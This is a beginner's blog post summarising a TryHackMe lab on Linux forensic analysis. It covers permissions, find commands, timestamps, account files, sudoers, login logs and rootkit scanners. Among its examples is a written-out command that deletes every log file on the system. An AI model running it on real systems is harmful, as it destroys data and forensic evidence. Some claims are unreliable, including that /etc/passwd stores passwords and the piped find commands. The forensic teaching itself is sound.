From Logs to Rootkits: A Complete Linux Forensic Analysis Breakdown

From Logs to Rootkits: A Complete Linux Forensic Analysis Breakdown | by Devansh Patel - Freedium Milestone: 20GB Reached We’ve reached 20GB of stored data — thank you for helping us grow! Patreon Ko-fi Liberapay Close < Go to the original From Logs to Rootkits: A Complete Linux Forensic Analysis Breakdown Just completed this amazing and very technically informative room in the TryHackMe "Linux File System Analysis" and found this very helpful… Devansh Patel Follow ~8 min read · March 22, 2026 (Updated: March 22, 2026) · Free: Yes Just completed this amazing and very technically informative room in the TryHackMe "Linux File System Analysis" and found this very helpful because it taught lot of commands which i didn't knew earlier, So thought of sharing it and break down the concepts in easy and understandable language. Live Forensic File System Analysis → Examining the file system analysis while it is running live in the environment and system in order to identify any of the security breaches incident . The purpose of this file system analysis is to :- check for the account logs, file and folder ownerships and permissions, check for the account processess, check for the system configuration files . This file system analysis helps in incident response by telling when did it occur, how the attacker entered into the system, what happened, how it affected the system, what changes were made, what traces were left find . Now the forensic investigators does not quickly try to fix the system during the incident response because system will be vulnerable & cannot be trusted, attacker may be still inside the system, malware can remain undetected, evidence can be destroyed . Instead at the time incident response we must patch vulnerabilities, collect the evidence, document the findings, isolate the system, disconnect the external communications . Now there is a difference between the Windows and Linux File System . Windows v/s Linux Mounting the File System Before the Analysis Due to the incident response or any data breach the attacker infect file system and could alter the file system binaries especially producing the fake results of the commands like pwd, ps, ssh, ls, cat and many others. So incase of that it is important of to have the correct file system binaries so one way is to export all of them in the USB drive. So here we can use the below export path to mount the libraries. export PATH=/mnt/usb/bin:/mnt/usb/sbin export LD_LIBRARY_PATH=/mnt/usb/lib:/mnt/usb/lib64 Reading about the File Permissions and Ownership of it As we can see in the above image the file permissions of the file has three parts :- Permission for the Owner, Permission for the Group, Permission for the Others . Now in that we control the read, write and execute permissions for each group by using the chmod command and then writing the permissions number as shown in the below image according to the permissions we want to give. From the below image we can clearly see that how to change the file permissions of any file in the linux . To view the hidden files and file permissions of the linux file system files, we have to use the ls -alh command where - a → Displays all the files in the directory including the hidden ones , -l → Display in the long listing format , -h → Display the human readable file sizes . Attackers often target /tmp [ Temporary files directory which is writable by most of the users ], /var/tmp [ Temporary files directory which is writable ], /dev/shm [ Shared memory location file which is also normally writable by the users ] . Finding the unusual scripts saved in the /var/www/html/uploads directories in case of the file upload vulnerabilities We can use that ls -alh command to list the files and then pipe that output to the grep -v "jpeg" that would negate the jpeg files in the output and then only show the files apart from the jpeg files . As you can see in the image above you can see that we have found the .phtml file in that we got the dangerous php script that would execute the system commands and could reveal the sensitive information and directory traversal . Explanation of the script is shown in the image below . The attribute in the parameter by this command and the command would get executed and the output be produced. Important Use Case of the Find Command find / -perm 777 -type f -executable 2>/dev/null :- This command is to find the files in which all the three users have full permissions of the files and are executable in the nature and start find from the root directory of the file system [/] and in case of [.] then start from the current directory and mute the errors and send the errors in the /dev/null to produce the clean output . find / -name "*.log" -exec rm {} \; :- This command allows to run the command on the found files. In this command we are finding the all log files and then removing them from the system using the -exec option . find / -atime -1 | find / -ctime -1 | find / -mtime -1 :- atime [ When was the last the file was accessed like read or opened ], ctime [ When was the last the file's metadata was changed like file permissions, inodes, file ownerships ], mtime [ When was the last the file's content was updated], -1 [In lasty 24 hours ] . find / -type f -name ".*" -executable 2>/dev/null :- Find the all the hidden executable files in the system . Find Command Properly Explained Reading the Metadata Metadata is the information embedded in the file which describes the good information about the file system tells the information about the file ownership, file permissions, inode numbers, creation dates, access times and modify times . So one such great tool to this is the exiftool. Exiftool is a Perl-based command-line utility with extensive capabilities for extracting and altering metadata from files by parsing their headers and embedded metadata structures. Analyzing the Checksums Checksums are the randomly generated data by the cryptographic hashing functions like the md5dsum and the sha256 so that to ensure the proper integrity because due to that even the minor changes in the file results in the change in the hashing function . Viewing the Timestamps ls -ul :- To view the access time of all the files . ls -cl :- To view the change time of all the files . ls -l :- To view the modify time of all the files . stat command :- Use to display the metadata of the file/directory . Identifying the Passwords and Groups and Usernames /etc/passwd :- This is the most important file which contains the all the users and their passwords with their UID and GID as well . [Note :- The user with the UID = 0 will have all the privileges to run the commands] /etc/passwd syntax Above image shows the format of the /etc/passwd file in which this are separated by the colons /etc/shadow :- This file contains the user and their passwords in the hashed form . /etc/group :- This file contains the groups names with the password and the Group Members names as well . getent group [Group Name] :- This command is used to find the members of the particular group . groups [Name of the user] :- To find the group names the user belongs to . /etc/sudoers :- This is the most important file which controls that who can run the commands as another user using the sudo . So if we see ALL=(ALL:ALL) ALL in any user part then that user has privileges to run all the commands using the sudo . Debian Packages Integrity Check debsums command :- This is the command which is used to check the file integrity of the debian packages installed on the system . Hidden Files in the Home Directory .ssh :- This is the very important ssh directory which contains the ssh configuration files and the ssh keys as well . .bashrc :- This is the very important hidden file which the attacker can modify and can execute the malicious commands on the startup of the system . .bash_history :- This file contains the history of the commands ran in the past . .profile :- This is the file which runs on the login of the user . Checking the Login History last :- Gives the list of the last login history from the file /var/log/wtmp . lastb :- Gives the list of failed login attempts from the file /var/log/btmp . lastlog :- Gives the last login of every user . who :- Gives the current user logged in . Rootkits Rootkits :- A rootkit is a type of malicious software designed to gain and maintain unauthorized (root/admin) access to a system while hiding its presence . Chkrootkit [Check Rootkit] :- Simple tool to detect the behaviours of the rootkit. It scans the file systems, check for rootkit signatures, check for the system binaries, identifies the predefined rootkits from the patterns. But some of the rootkits are undetectable from this . Rkhunter [Rootkit Hunter] :- T his is the advanced tool for the rootkit hunting . Final Takeaway Attackers don't break systems loudly. They hide inside them. Inside permissions. Inside logs. Inside hidden files. Inside user accounts and sudo privileges. And most importantly… inside the details you ignore. Linux File System Analysis is not about running commands. It is about connecting small clues into a complete story. A strange permission. A modified timestamp. A hidden executable. A suspicious login. Individually, they mean nothing. Together, they reveal everything. Real security is not just detecting attacks. It is understanding: what happened, how it happened, and what was left behind. If you can read the filesystem properly, you don't just see files — You see evidence. Happy Hacking. #cybersecurity #linux #linux-tutorial #hacking #bug-bounty Reporting a Problem Sometimes we have problems displaying some Medium posts. If you have a problem that some images aren't loading - try using VPN. Probably you have problem with access to Medium CDN (or fucking Cloudflare's bot detection algorithms are blocking you).